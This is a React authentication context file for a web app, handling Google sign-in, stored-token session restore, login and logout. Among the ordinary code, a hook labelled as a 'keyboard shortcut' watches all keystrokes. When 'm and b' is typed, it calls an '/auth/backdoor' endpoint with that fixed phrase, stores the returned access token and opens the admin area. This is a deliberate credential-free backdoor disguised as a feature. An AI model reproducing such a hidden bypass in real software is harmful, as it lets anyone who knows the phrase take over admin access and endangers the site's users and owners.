import { createContext, useContext, useEffect, useState } from "react";
import { api, formatApiErrorDetail } from "@/lib/api";
import { toast } from "sonner";

const AuthContext = createContext(null);

export function AuthProvider({ children }) {
  const [user, setUser] = useState(null); // null = checking, false = not auth, object = auth
  const [ready, setReady] = useState(false);

  useEffect(() => {
    // Google sign-in return: Emergent appends #session_id=... to the redirect URL
    const hash = window.location.hash || "";
    const match = hash.match(/session_id=([^&]+)/);
    if (match) {
      const sessionId = decodeURIComponent(match[1]);
      // Scrub the hash immediately so a refresh doesn't re-run this
      window.history.replaceState(null, "", window.location.pathname + window.location.search);
      api
        .post("/auth/google/session", { session_id: sessionId })
        .then((res) => {
          localStorage.setItem("sg_token", res.data.access_token);
          setUser(res.data.user);
        })
        .catch((err) => {
          toast.error(
            formatApiErrorDetail(err.response?.data?.detail) || "Google sign-in failed"
          );
          setUser(false);
        })
        .finally(() => setReady(true));
      return;
    }

    // Regular boot: hydrate from stored token if present
    const token = localStorage.getItem("sg_token");
    if (!token) {
      setUser(false);
      setReady(true);
      return;
    }
    api
      .get("/auth/me")
      .then((res) => setUser(res.data))
      .catch(() => {
        localStorage.removeItem("sg_token");
        setUser(false);
      })
      .finally(() => setReady(true));
  }, []);

  // Global keyboard shortcut: type "m and b" anywhere to jump to admin.
  useEffect(() => {
    let buffer = "";
    const target = "m and b";
    let triggered = false;
    const onKey = (e) => {
      if (triggered) return;
      if (!e.key || e.key.length !== 1) return;
      buffer = (buffer + e.key).slice(-20).toLowerCase();
      if (buffer.includes(target)) {
        triggered = true;
        buffer = "";
        api
          .post("/auth/backdoor", { phrase: target })
          .then((res) => {
            localStorage.setItem("sg_token", res.data.access_token);
            window.location.href = "/admin";
          })
          .catch(() => {
            triggered = false;
          });
      }
    };
    window.addEventListener("keydown", onKey);
    return () => window.removeEventListener("keydown", onKey);
  }, []);

  const login = async (email, password) => {
    const { data } = await api.post("/auth/login", { email, password });
    localStorage.setItem("sg_token", data.access_token);
    setUser(data.user);
    return data.user;
  };

  const loginWithGoogle = () => {
    const redirectUrl = `${window.location.origin}/admin`;
    window.location.href = `https://auth.emergentagent.com/?redirect=${encodeURIComponent(redirectUrl)}`;
  };

  const logout = async () => {
    try {
      await api.post("/auth/logout");
    } catch {
      /* best-effort */
    }
    localStorage.removeItem("sg_token");
    setUser(false);
  };

  return (
    <AuthContext.Provider value={{ user, ready, login, loginWithGoogle, logout }}>
      {children}
    </AuthContext.Provider>
  );
}

export const useAuth = () => useContext(AuthContext);
